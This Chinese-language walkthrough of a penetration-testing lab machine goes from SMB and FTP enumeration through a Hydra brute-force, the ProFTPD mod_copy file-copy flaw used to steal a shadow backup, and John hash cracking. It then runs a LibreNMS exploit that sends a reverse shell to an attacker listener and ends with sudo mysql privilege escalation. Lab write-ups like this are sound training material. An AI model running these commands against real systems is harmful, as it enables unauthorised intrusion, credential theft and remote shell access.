信息搜集
nmap -sn 192.168.8.0/24nmap -sT --min-rate 10000 192.168.8.7 -p重点关注445和21端口,一个smb一个ftp,这两个都是有关存储的
nmap -sT -sC -sV -O 192.168.8.7 -p21,22,80,139,445 -oA portssmb渗透
enum4linux 192.168.8.7 -e US有个匿名登录
smbclient //192.168.8.7/anonymous有一个日志文件
mget logs.txt泄露文件分析
存储了一个shadow.bak密码文件到备份文件夹
泄露了一个ftp用户名
ftp渗透
之前端口扫描的时候探测到了,ftp的版本
ftp爆破
之前文件泄露中拿到了一个文件名,尝试进行爆破,这个等待时间较长
hydra -l aeolus -P /usr/share/wordlists/rockyou.txt -f ftp://192.168.8.7ps:第一次打的时候爆破出来了,第二次耗了两个小时才出来,这个应该不是常规路径,不推荐
未授权文件复制漏洞利用
有历史漏洞,但是目录没有写入权限,没有办法直接反弹shell
尝试文件复制,把shadow.bak文件复制到smb共享文件夹中
ftp> site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/shadow.bak 250 Copy successful下载shadow文件
hash碰撞
john pass.hash --wordlist=/usr/share/wordlists/rockyou.txt拿到第一个凭证
aeolus$sergioteamo内网渗透
ss -ntlp发现内网还有一个8080端口服务
ssh内网端口转发
ssh -L 8080:127.0.0.1:8080 aeolus@192.168.8.7 -N -L 参数详解 格式:-L [本地地址:]本地端口:目标地址:目标端口 -L 8080:127.0.0.1:8080 ↑ ↑ ↑ 本地端口 目标地址 目标端口 - 8080(本地端口)— 你本机监听 8080 端口 - 127.0.0.1(目标地址)— 这是相对于远程主机的地址,即远程主机的 localhost - 8080(目标端口)— 远程主机上 127.0.0.1:8080 的服务端口 数据流向 你的电脑:8080 ──SSH加密隧道──> 192.168.8.7 ──> 192.168.8.7:8080 (本机服务) 当你访问 http://127.0.0.1:8080 时,流量会被 SSH 加密后转发到 192.168.8.7,然后由远程主机访问它自己的 127.0.0.1:8080。 典型使用场景 远程主机 192.168.8.7 上运行了一个只监听 localhost 的服务(如 Web 管理面板、数据库、API 服务),这个服务不对外网暴露。通过这条命令,你可以安全地在你本地直接访问该服务,就像它在本地运行一样。 -N 的作用 不加 -N 的话,SSH 连接后会给你一个远程 shell。加上 -N 表示"不执行远程命令",连接建立后终端会挂起,只维持隧道,不打开 shell。适合单纯做端口转发时使用。发现是一个librenms服务
librenms渗透
尝试用刚才获取的凭证,成功登录后台
查找漏洞利用
searchsploit librenms查看利用方式,发现需要登录的cookie
burp登录抓包,拿到cookie
python2 47044.py http://127.0.0.1:8080/ "PHPSESSID=sr2acfp9qithdfben944bgrmh6; XSRF-TOKEN=eyJpdiI6ImZJWUtCRjB2Q3AwM1UzNWJPTWJjbnc9PSIsInZhbHVlIjoiVzRzOHkzZ1wvUDNMcWticUl1REdGMDUxTmVqRTlGT2U0cCtFT1JZTTNkMFh5T0V5NWtOQTRyR291TkI5K1NXVDB1Ukoyb0pDQVUrZG1MQnBKaStcLzlkZz09IiwibWFjIjoiOTEzODY1ZTJlMjRhZGE0ODIzZWYwM2Y4YjE2MDNjMWU1MTMxNTBjNDFkMTE5NWRjOTVjM2QxNTVmMTMzMTg4ZiJ9; librenms_session=eyJpdiI6IjF0OVZPSUtsOU5pSnNMMEl5eld2RWc9PSIsInZhbHVlIjoiOWoxSFM2cmV4Mm13S0pXRzd1RG55T1duc2srNEk0VGtrUDRqNlFKZmtyWVpLRlQ1Zk0zS2hlXC85RWNpd1wva0RVRThZdVJiazFZWTltRmpFeTdkeGJLUT09IiwibWFjIjoiZjM5ZTk5ZTQyOGRhNDEwNWZiNGYyMTc0ZjQyMjc3NmRkOTk0MGY1YmMyYzc2MDExMWEwN2U3ZmQxNWQ4YzM5YiJ9" 192.168.8.11 4444启动msf
配置参数
成功拿到shell
sudo提权
sudo -l可以免密执行sudo权限的mysql
GTFOBINs提权
成功提权
补充一个兔子洞
内网还有一个邮件服务,exim 4.89
有一个本地提权漏洞,似乎无法成功利用
小结一下
靶机整理难度不高,主要是针对smb泄露文件,展开两条思路进一步攻击;一个是用户名aeolus去爆破;一个是shadow备份文件和共享文件路径泄露,通过proftpd文件复制漏洞,拿到shadow备份文件,进行hash碰撞;后面的内网渗透,ssh端口转发,思路都非常流畅,是一台很好的练手的靶机